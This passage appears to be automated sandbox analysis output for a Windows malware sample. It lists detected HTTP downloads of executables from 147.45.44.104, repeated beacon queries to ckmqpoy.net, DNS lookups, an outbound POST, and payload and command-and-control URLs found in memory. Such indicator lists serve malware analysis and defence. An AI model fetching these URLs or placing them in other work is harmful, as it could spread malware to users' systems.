                              Source: global trafficHTTP traffic detected: GET /yuop/66eea6336b153_app16540406983468141987.exe#1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /lopsa/66ea645129e6a_jacobs.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /yuop/66edb89bc4073_crypted.exe#xin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /lopsa/66ebb3bf78bd6_Send.exe#111us300 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /yuop/66ed9885d9aee_Day2.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /prog/66ecb454d2b4a_lgfdsjgds.exe HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 147.45.44.104Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1Host: ckmqpoy.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                              Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1Host: ckmqpoy.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                              Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1Host: ckmqpoy.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                              Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1Host: ckmqpoy.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                              Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1Host: ckmqpoy.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                              Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1Host: ckmqpoy.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                              Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1Host: ckmqpoy.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                              Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1Host: ckmqpoy.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                              Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1Host: ckmqpoy.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                              Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1Host: ckmqpoy.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                              Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1Host: ckmqpoy.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                              Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1Host: ckmqpoy.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                              Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1Host: ckmqpoy.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                              Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1Host: ckmqpoy.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                              Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1Host: ckmqpoy.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                              Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1Host: ckmqpoy.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                              Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1Host: ckmqpoy.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                              Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1Host: ckmqpoy.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                              Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1Host: ckmqpoy.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                              Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1Host: ckmqpoy.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                              Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1Host: ckmqpoy.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                              Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1Host: ckmqpoy.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                              Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1Host: ckmqpoy.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                              Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1Host: ckmqpoy.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                              Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1Host: ckmqpoy.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                              Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1Host: ckmqpoy.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                              Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1Host: ckmqpoy.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                              Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1Host: ckmqpoy.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                              Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1Host: ckmqpoy.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                              Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1Host: ckmqpoy.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                              Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1Host: ckmqpoy.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                              Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1Host: ckmqpoy.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                              Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1Host: ckmqpoy.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                              Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1Host: ckmqpoy.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                              Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1Host: ckmqpoy.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                              Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1Host: ckmqpoy.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                              Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1Host: ckmqpoy.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                              Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1Host: ckmqpoy.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                              Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1Host: ckmqpoy.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                              Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1Host: ckmqpoy.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                              Source: global trafficDNS traffic detected: DNS query: api64.ipify.org
                              Source: global trafficDNS traffic detected: DNS query: ipinfo.io
                              Source: global trafficDNS traffic detected: DNS query: bitbucket.org
                              Source: global trafficDNS traffic detected: DNS query: nerv.com.pe
                              Source: global trafficDNS traffic detected: DNS query: bbuseruploads.s3.amazonaws.com
                              Source: global trafficDNS traffic detected: DNS query: iplogger.org
                              Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                              Source: global trafficDNS traffic detected: DNS query: tventyvf20pt.top
                              Source: global trafficDNS traffic detected: DNS query: ckmqpoy.net
                              Source: global trafficDNS traffic detected: DNS query: cowod.hopto.org
                              Source: global trafficDNS traffic detected: DNS query: nwgrus.ru
                              Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CFIECBFIDGDAKFHIEHJKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Content-Length: 256Connection: Keep-AliveCache-Control: no-cache
                              Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1668271812.0000000004520000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://103.130.147.211/Files/1.exe
                              Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://103.130.147.211/Files/1.exeC:
                              Source: RegAsm.exe, 00000002.00000002.1668271812.0000000004520000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://103.130.147.211/Files/1.exeM
                              Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/lopsa/66ea645129e6a_jacobs.exe
                              Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/lopsa/66ea645129e6a_jacobs.exe=
                              Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/lopsa/66ea645129e6a_jacobs.exeC:
                              Source: RegAsm.exe, 00000002.00000002.1668271812.00000000045B3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/lopsa/66ebb3bf78bd6_Send.exe#111us300
                              Source: RegAsm.exe, 00000002.00000002.1668271812.0000000004520000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/lopsa/66ebb3bf78bd6_Send.exe#111us3001
                              Source: RegAsm.exe, 00000002.00000002.1668271812.0000000004520000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/lopsa/66ebb3bf78bd6_Send.exe#111us300A
                              Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/lopsa/66ebb3bf78bd6_Send.exe#111us300C:
                              Source: RegAsm.exe, 00000002.00000002.1668271812.0000000004520000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/lopsa/66ebb3bf78bd6_Send.exe#111us300a
                              Source: RegAsm.exe, 00000002.00000002.1668271812.00000000045B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/lopsa/66ebb3bf78bd6_Send.exe#111us300e
                              Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/lopsa/66ebb3bf78bd6_Send.exe#111us300xe
                              Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/prog/66e705d09b33c_jack.exe
                              Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/prog/66e705d09b33c_jack.exeC
                              Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/prog/66e705d09b33c_jack.exeC:
                              Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/yuop/66ed9885d9aee_Day2.exe
                              Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/yuop/66ed9885d9aee_Day2.exeC:
                              Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/yuop/66edb89bc4073_crypted.exe#xin
                              Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/yuop/66edb89bc4073_crypted.exe#xinC:
                              Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/yuop/66edb89bc4073_crypted.exe#xinxet
                              Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1668271812.0000000004520000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1668271812.0000000004588000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/yuop/66ee79315857f_setup33333.exe#lyla
                              Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/yuop/66ee79315857f_setup33333.exe#lylaC:
                              Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/yuop/66ee79315857f_setup33333.exe#lylabb
                              Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1668271812.0000000004588000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/yuop/66eea6336b153_app16540406983468141987.exe#1
                              Source: RegAsm.exe, 00000002.00000002.1668271812.0000000004588000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/yuop/66eea6336b153_app16540406983468141987.exe#1)
                              Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/yuop/66eea6336b153_app16540406983468141987.exe#15l
                              Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/yuop/66eea6336b153_app16540406983468141987.exe#18g
                              Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/yuop/66eea6336b153_app16540406983468141987.exe#1C:
                              Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/yuop/66eea6336b153_app16540406983468141987.exe#1Ra
                              Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1668271812.0000000004588000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.111.174.109/kurwa
                              Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.111.174.109/kurwaC:
                              Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.111.174.109/kurwaS27
                              Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.111.174.109/kurwaib
                              Source: RegAsm.exe, 00000002.00000002.1668271812.00000000045A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.33/thebig/noode.exe
                              Source: RegAsm.exe, 00000002.00000002.1668271812.0000000004520000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.33/thebig/noode.exe/
                              Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.33/thebig/noode.exeC:
                              Source: RegAsm.exe, 00000002.00000002.1668271812.0000000004588000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.33/thebig/noode.exeP
                              Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.33/thebig/noode.exeR
                              Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.33/thebig/noode.exet
                              Source: RegAsm.exe, 00000002.00000002.1668271812.00000000045A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.33/thebig/noode.exew
                              Source: RegAsm.exe, 00000002.00000002.1668271812.00000000045B3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1665943418.0000000000F27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://41.216.188.190/
                              Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://41.216.188.190/O
                              Source: RegAsm.exe, 00000002.00000002.1668271812.00000000045B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://41.216.188.190/S
                              Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1668271812.00000000045A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://41.216.188.190/api/wp-admin.php
